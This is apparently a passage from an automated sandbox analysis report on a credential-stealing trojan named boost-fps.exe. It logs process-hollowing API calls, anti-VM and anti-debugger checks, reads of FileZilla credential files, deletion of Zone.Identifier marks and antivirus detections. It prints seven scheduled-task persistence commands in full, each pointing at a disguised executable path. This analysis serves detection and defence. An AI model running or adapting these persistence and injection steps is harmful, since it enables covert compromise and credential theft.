CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 8156 thread_handle: 0x000003bc process_identifier: 6636 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\ProgramData\바탕 화면\pw.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003e0	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 2, 2021, 10:56 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x000a2200', u'virtual_address': u'0x00002000', u'entropy': 7.880110596134168, u'name': u'.text', u'virtual_size': u'0x000a20f4'}

entropy

7.88011059613

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x000b2000', u'virtual_address': u'0x000a6000', u'entropy': 6.950448991297877, u'name': u'.rsrc', u'virtual_size': u'0x000b1fa0'}

entropy

6.9504489913

description

A section with a high entropy has been found

entropy

0.999632623071

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 2, 2021, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 2, 2021, 10:56 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (26 events)

description	Listen for incoming communication	rule	network_tcp_listen
description	Run a keylogger	rule	keylogger
description	Record Audio	rule	sniff_audio
description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Listen for incoming communication	rule	network_tcp_listen
description	Run a keylogger	rule	keylogger
description	Record Audio	rule	sniff_audio
description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (7 events)

cmdline	"schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Windows\System32\CertEnrollUI\SearchProtocolHost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "thunderbird" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\thunderbird.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\ProgramData\바탕 화면\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\ipconfig\winlogon.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\agent\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Python27\libs\Idle.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\tmpzdcjvb\lib\api\csrss.exe'" /rl HIGHEST /f

Executes one or more WMI queries which can be used to identify virtual machines (3 events)

wmi	SELECT * FROM Win32_Processor
wmi	SELECT * FROM Win32_BIOS
wmi	Select * From Win32_ComputerSystem

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 8104 region_size: 434176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000270	1	0	0
NtAllocateVirtualMemory April 2, 2021, 10:56 a.m.	process_identifier: 448 region_size: 434176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000027c	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 2, 2021, 10:56 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (7 events)

cmdline	"schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Windows\System32\CertEnrollUI\SearchProtocolHost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "thunderbird" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\thunderbird.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\ProgramData\바탕 화면\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\ipconfig\winlogon.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\agent\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Python27\libs\Idle.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\tmpzdcjvb\lib\api\csrss.exe'" /rl HIGHEST /f

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (7 events)

wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_DisplayConfiguration
wmi	Select * From Win32_ComputerSystem
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_BIOS
wmi	SELECT * FROM Win32_Processor
wmi	SELECT * FROM Win32_BaseBoard

Potential code injection by writing to the memory of another process (8 events)

Time & API	Arguments	Status	Return
WriteProcessMemory April 2, 2021, 10:38 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL-S^`à"<î[ `@ lP`[W` H.textô; < `.rsrc`>@@.relocB@B base_address: 0x00400000 process_identifier: 8104 process_handle: 0x00000270	1	1
WriteProcessMemory April 2, 2021, 10:38 a.m.	buffer: 0HX`ÄÄ4VS_VERSION_INFO½ïþ?$StringFileInfo000004B0Comments$CompanyName,FileDescription0FileVersion1.0.0.00InternalNamePi.exe(LegalCopyright,LegalTrademarks8OriginalFilenamePi.exe$ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0DVarFileInfo$Translation° base_address: 0x00466000 process_identifier: 8104 process_handle: 0x00000270	1	1
WriteProcessMemory April 2, 2021, 10:38 a.m.	buffer: Pð; base_address: 0x00468000 process_identifier: 8104 process_handle: 0x00000270	1	1
WriteProcessMemory April 2, 2021, 10:38 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 8104 process_handle: 0x00000270	1	1
WriteProcessMemory April 2, 2021, 10:56 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL-S^`à"<î[ `@ lP`[W` H.textô; < `.rsrc`>@@.relocB@B base_address: 0x00400000 process_identifier: 448 process_handle: 0x0000027c	1	1
WriteProcessMemory April 2, 2021, 10:56 a.m.	buffer: 0HX`ÄÄ4VS_VERSION_INFO½ïþ?$StringFileInfo000004B0Comments$CompanyName,FileDescription0FileVersion1.0.0.00InternalNamePi.exe(LegalCopyright,LegalTrademarks8OriginalFilenamePi.exe$ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0DVarFileInfo$Translation° base_address: 0x00466000 process_identifier: 448 process_handle: 0x0000027c	1	1
WriteProcessMemory April 2, 2021, 10:56 a.m.	buffer: Pð; base_address: 0x00468000 process_identifier: 448 process_handle: 0x0000027c	1	1
WriteProcessMemory April 2, 2021, 10:56 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 448 process_handle: 0x0000027c	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory April 2, 2021, 10:38 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL-S^`à"<î[ `@ lP`[W` H.textô; < `.rsrc`>@@.relocB@B base_address: 0x00400000 process_identifier: 8104 process_handle: 0x00000270	1	1	0
WriteProcessMemory April 2, 2021, 10:56 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL-S^`à"<î[ `@ lP`[W` H.textô; < `.rsrc`>@@.relocB@B base_address: 0x00400000 process_identifier: 448 process_handle: 0x0000027c	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 5096 called NtSetContextThread to modify thread in remote process 8104
Process injection	Process 6636 called NtSetContextThread to modify thread in remote process 448
NtSetContextThread April 2, 2021, 10:38 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4611054 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000026c process_identifier: 8104	1	0	0
NtSetContextThread April 2, 2021, 10:56 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4611054 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000278 process_identifier: 448	1	0	0

Attempts to remove evidence of file being downloaded from the Internet (7 events)

file	C:\Python27\agent\pw.exe:Zone.Identifier
file	C:\Windows\System32\CertEnrollUI\SearchProtocolHost.exe:Zone.Identifier
file	C:\Windows\System32\ipconfig\winlogon.exe:Zone.Identifier
file	C:\ProgramData\바탕 화면\pw.exe:Zone.Identifier
file	C:\ProgramData\Start Menu\thunderbird.exe:Zone.Identifier
file	C:\tmpzdcjvb\lib\api\csrss.exe:Zone.Identifier
file	C:\Python27\libs\Idle.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 5096 resumed a thread in remote process 8104
Process injection	Process 6636 resumed a thread in remote process 448
NtResumeThread April 2, 2021, 10:38 a.m.	thread_handle: 0x0000026c suspend_count: 1 process_identifier: 8104	1	0	0
NtResumeThread April 2, 2021, 10:56 a.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 448	1	0	0

File has been identified by 24 AntiVirus engines on VirusTotal as malicious (24 events)

Elastic	malicious (high confidence)
FireEye	Generic.mg.92fc1129af30ba08
Qihoo-360	Win32/TrojanSpy.Generic.HgIASR4A
Cylance	Unsafe
Cybereason	malicious.46a78d
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Kryptik.AAEP
APEX	Malicious
Avast	Win32:MalwareX-gen [Trj]
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan-Spy.MSIL.Stealer.gen
Paloalto	generic.ml
DrWeb	Trojan.PWS.Stealer.30110
McAfee-GW-Edition	Artemis!Trojan
Microsoft	Trojan:Win32/Sehyioa.A!cl
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Stealer.gen
McAfee	PWS-FCXP!92FC1129AF30
MAX	malware (ai score=99)
Malwarebytes	Malware.AI.539684289
Rising	Spyware.Stealer!8.3090 (CLOUD)
Fortinet	MSIL/GenKryptik.FDJX!tr
BitDefenderTheta	Gen:NN.ZemsilF.34662.vn2@a0YStFdG
AVG	Win32:MalwareX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (W)

Executed a process and injected code into it, probably while unpacking (50 out of 66 events)

Time & API	Arguments	Status	Return
NtResumeThread April 2, 2021, 10:37 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 5096	1	0
NtResumeThread April 2, 2021, 10:37 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 5096	1	0
NtResumeThread April 2, 2021, 10:37 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 5096	1	0
NtResumeThread April 2, 2021, 10:38 a.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 5096	1	0
NtGetContextThread April 2, 2021, 10:38 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread April 2, 2021, 10:38 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread April 2, 2021, 10:38 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 5096	1	0
CreateProcessInternalW April 2, 2021, 10:38 a.m.	thread_identifier: 6200 thread_handle: 0x0000026c process_identifier: 8104 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\boost-fps.exe track: 1 command_line: "{path}" filepath_r: C:\Users\test22\AppData\Local\Temp\boost-fps.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000270	1	1
NtGetContextThread April 2, 2021, 10:38 a.m.	thread_handle: 0x0000026c	1	0
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 8104 region_size: 434176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000270	1	0
WriteProcessMemory April 2, 2021, 10:38 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL-S^`à"<î[ `@ lP`[W` H.textô; < `.rsrc`>@@.relocB@B base_address: 0x00400000 process_identifier: 8104 process_handle: 0x00000270	1	1
WriteProcessMemory April 2, 2021, 10:38 a.m.	buffer: base_address: 0x00402000 process_identifier: 8104 process_handle: 0x00000270	1	1
WriteProcessMemory April 2, 2021, 10:38 a.m.	buffer: 0HX`ÄÄ4VS_VERSION_INFO½ïþ?$StringFileInfo000004B0Comments$CompanyName,FileDescription0FileVersion1.0.0.00InternalNamePi.exe(LegalCopyright,LegalTrademarks8OriginalFilenamePi.exe$ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0DVarFileInfo$Translation° base_address: 0x00466000 process_identifier: 8104 process_handle: 0x00000270	1	1
WriteProcessMemory April 2, 2021, 10:38 a.m.	buffer: Pð; base_address: 0x00468000 process_identifier: 8104 process_handle: 0x00000270	1	1
WriteProcessMemory April 2, 2021, 10:38 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 8104 process_handle: 0x00000270	1	1
NtSetContextThread April 2, 2021, 10:38 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4611054 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000026c process_identifier: 8104	1	0
NtResumeThread April 2, 2021, 10:38 a.m.	thread_handle: 0x0000026c suspend_count: 1 process_identifier: 8104	1	0
NtResumeThread April 2, 2021, 10:55 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 8104	1	0
NtResumeThread April 2, 2021, 10:55 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 8104	1	0
NtResumeThread April 2, 2021, 10:55 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 8104	1	0
NtResumeThread April 2, 2021, 10:55 a.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 8104	1	0
NtResumeThread April 2, 2021, 10:55 a.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 8104	1	0
NtResumeThread April 2, 2021, 10:55 a.m.	thread_handle: 0x000002f8 suspend_count: 1 process_identifier: 8104	1	0
NtResumeThread April 2, 2021, 10:55 a.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 8104	1	0
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 5272 thread_handle: 0x00000394 process_identifier: 8300 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Windows\System32\CertEnrollUI\SearchProtocolHost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000039c	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 6980 thread_handle: 0x00000394 process_identifier: 1892 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Python27\libs\Idle.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003a0	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 9100 thread_handle: 0x000003ac process_identifier: 8636 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\agent\pw.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b0	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 3980 thread_handle: 0x000003ac process_identifier: 3456 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "thunderbird" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\thunderbird.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b4	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 7884 thread_handle: 0x000003bc process_identifier: 9112 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\ipconfig\winlogon.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003c8	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 6440 thread_handle: 0x000003bc process_identifier: 3932 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\tmpzdcjvb\lib\api\csrss.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003cc	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 6956 thread_handle: 0x000003bc process_identifier: 4168 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\ProgramData\바탕 화면\pw.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003d4	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 8156 thread_handle: 0x000003bc process_identifier: 6636 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\ProgramData\바탕 화면\pw.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003e0	1	1
NtResumeThread April 2, 2021, 10:55 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 6636	1	0
NtResumeThread April 2, 2021, 10:55 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 6636	1	0
NtResumeThread April 2, 2021, 10:55 a.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 6636	1	0
NtResumeThread April 2, 2021, 10:56 a.m.	thread_handle: 0x00000268 suspend_count: 1 process_identifier: 6636	1	0
CreateProcessInternalW April 2, 2021, 10:56 a.m.	thread_identifier: 9148 thread_handle: 0x00000278 process_identifier: 448 current_directory: filepath: C:\ProgramData\바탕 화면\pw.exe track: 1 command_line: "{path}" filepath_r: C:\ProgramData\바탕 화면\pw.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000027c	1	1
NtGetContextThread April 2, 2021, 10:56 a.m.	thread_handle: 0x00000278	1	0
NtAllocateVirtualMemory April 2, 2021, 10:56 a.m.	process_identifier: 448 region_size: 434176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000027c	1	0
WriteProcessMemory April 2, 2021, 10:56 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL-S^`à"<î[ `@ lP`[W` H.textô; < `.rsrc`>@@.relocB@B base_address: 0x00400000 process_identifier: 448 process_handle: 0x0000027c	1	1
WriteProcessMemory April 2, 2021, 10:56 a.m.	buffer: base_address: 0x00402000 process_identifier: 448 process_handle: 0x0000027c	1	1
WriteProcessMemory April 2, 2021, 10:56 a.m.	buffer: 0HX`ÄÄ4VS_VERSION_INFO½ïþ?$StringFileInfo000004B0Comments$CompanyName,FileDescription0FileVersion1.0.0.00InternalNamePi.exe(LegalCopyright,LegalTrademarks8OriginalFilenamePi.exe$ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0DVarFileInfo$Translation° base_address: 0x00466000 process_identifier: 448 process_handle: 0x0000027c	1	1
WriteProcessMemory April 2, 2021, 10:56 a.m.	buffer: Pð; base_address: 0x00468000 process_identifier: 448 process_handle: 0x0000027c	1	1
WriteProcessMemory April 2, 2021, 10:56 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 448 process_handle: 0x0000027c	1	1
NtSetContextThread April 2, 2021, 10:56 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4611054 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000278 process_identifier: 448	1	0
NtResumeThread April 2, 2021, 10:56 a.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 448	1	0
NtResumeThread April 2, 2021, 10:56 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 448	1	0
NtResumeThread April 2, 2021, 10:56 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 448	1	0
NtResumeThread April 2, 2021, 10:56 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 448	1	0
NtResumeThread April 2, 2021, 10:56 a.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 448	1	0

boost-fps.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All